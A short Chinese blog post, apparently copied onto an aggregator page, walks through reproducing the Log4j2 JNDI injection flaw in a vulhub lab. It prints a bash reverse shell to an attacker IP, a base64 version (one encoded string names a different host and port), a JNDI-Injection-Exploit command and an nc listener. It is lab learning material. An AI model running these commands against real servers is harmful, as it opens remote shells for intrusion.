当前位置: 首页 > article >正文

vulhub靶场log4j2漏洞复现

article 2025/3/20 4:47:53

开启环境

进入主页

在DNSLOG平台上获取⼀个域名来监控注⼊

开始反弹Shell,下载一个JNDI-Injection-Explo到攻击机

bash -i >& /dev/tcp/192.168.10.233/8888 0>&1

反弹base64加密

 YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMy82NjY2IDA+JjE=

最终payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84ODg4IDA+JjE=
}|{base64,-d}|{bash, -i}" -A "192.168.10.233"

监听nc -lvvp 8888

使用jdk1.8的payload直接访问


http://www.kler.cn/a/296827.html

相关文章:

  • Ansible Tower与AWX:构建可视化的运维自动化解决方案
  • C++11第三弹:lambda表达式 | 新的类功能 | 模板的可变参数
  • Linux循环分支
  • 8Manage采购申请管理:轻松实现手动采购流程自动化
  • k8s灰度/金丝雀发布
  • 三、导航事件生命周期
  • 【详解】文件操作,Stream流
  • 【零基础必看的数据库教程】——SQL WHERE 子句
  • “从失业到月入过万:一位上班族的AI绘画赚钱之路”
  • 【Vue】关于Vue3的生命周期
  • openEuler 搭建 vsftpd 服务器(FTP Over SSL、虚拟用户)
  • 探索数据变换:Transform在数据分析中的重要性
  • 每日一题——第八十三题
  • 单源最短路径 洛谷【P4779】
  • 使用 uni-app 开发微信小程序:深入教程与技巧
  • 原生 iOS 引入 Flutter 报错 kernel_blob.bin 找不到
  • 【操作与配置】基于Tex Live的VS Code编写LaTex
  • 2025届计算机毕设选题推荐-基于python的校园车辆管理系统【python-爬虫-大数据定制】
  • 【网页播放器】播放自己喜欢的音乐
  • 基于SpringBoot的智能制造云平台系统的设计与实现计算机毕设